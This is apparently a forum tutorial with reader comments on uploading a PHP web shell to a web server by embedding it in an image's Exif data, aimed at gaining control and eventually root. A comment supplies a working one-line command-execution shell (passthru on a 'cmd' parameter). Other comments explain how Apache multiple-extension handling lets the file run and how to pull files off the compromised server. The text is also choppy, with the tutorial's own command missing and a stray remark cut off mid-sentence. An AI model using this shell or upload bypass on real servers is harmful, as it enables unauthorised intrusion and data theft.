When we hack a web server, we usually want to be able to control it in order to download files or further exploit it. There are many websites that let you upload files such as avatar pictures that don't take the proper security measures. In this series, I will be showing you how to gain root access to such a web server.

For part 1, we will be trying to upload a PHP file that allows us to control the system.

Requirements

We are going to need Nmap for this part of the tutorial.

Step 1: Scan the Server

For this tutorial, I have setup a vulnerable server on my network. Let's scan it.

Nmap found two open ports: 80 and 22, so we know that the server has both HTTP and SSH services. At this point, we could use Hydra to crack the root password on SSH, but that is not the point of this tutorial. Let's visit the webpage...

Step 2: Upload Attempt

Let's view the upload page...

The form tells us that the file must be either a .jpeg, a .jpg, or a .png file. But, just in case, we'll try to upload a malicious PHP file.

Darn it. It doesn't upload. But what if we add our malicious code to the Exif data of a picture file?

Step 3: Backdooring an Image

In order to upload our shell, we need to use a legitimate picture file. In order to get our code to run, we need to add the PHP code to the Exif data. Enter this command:

I would recommend using Kali Linux to do this. Windows is just not enough for hacking. Most tools don't even work with it and if they do, they are limited or have problems. This doesn't apply to all programs : most

Hi bro ...i check this method but didn't work!i test it on kali linux ... when open this url:127.0.0.1/uploader/files/pic.php.jpeg?cmd=ls -lajust show me that image! command didn't work!what's the problem?please help me ...

Since you don't really give any helpful information there are many different reasons why this didn't work. Including but not limited to:

You didn't properly insert the PHP scriptPHP is not allowed to execute in the directory your image is uploadedYour PHP script has been striped from the image fileThe server does not use or execute multiple file extensions

i move that image to other localhost directories ... but didn't work too!For other problems have you a solution?How do I know that my web server Support multiple extension or not?Thanks for your answer ...

I looked a little deeper into this and there seem to be a couple issues. The command inside the image isn't properly interpreted and causes PHP parsing errors. Change it to this.

<?php echo passthru(\$_GET['cmd']); _halt_compiler(); ?>

Then the default configuration does not seem to allow the use of multiple file extension by default. Meaning evil.php.jpeg will always be interpreted as a .jpeg file. You would have to change that by altering the default configuration.

Maybe I wasn't very clear. Let's start over by understanding what we are doing and/or taking advantage of (in regards to multiple file extensions). Apache uses a module called mod_mine and is loaded by default in Kali's apache.

root@Kali:~# a2enmod mimeModule mime already enabled

This module is used to associate file extensions with the various handlers, mime-types, languages and so on... This module is what allows files to have multiple file extensions if those extensions are associated with a handler. Meaning that evil.php.jpeg is associated as an image because of it's mime-type image/jpeg. It is also possible to associate evil.php.jpeg with the PHP handler regardless of it's mime-type (handlers will normally take over before mime-type). This creates an obvious security issue that we can take advantage of if we can upload an allowed file type with PHP script embedded into it (and bypass any other restrictions). You can create this security issue in by adding the PHP handler to the to the mod_mime config.

I know it has been a while since you posted but since there is allot of time between all these post I thought I would suggest a couple things.

If the server has ssh enabled you can use scp to transfer the file to your server. As an alternative and probably a better way to go though is to copy the file to a txt file using 'cp file.php file.txt' then you can go to the file.txt in your browser and copy and paste the contents to obtain a copy of the file.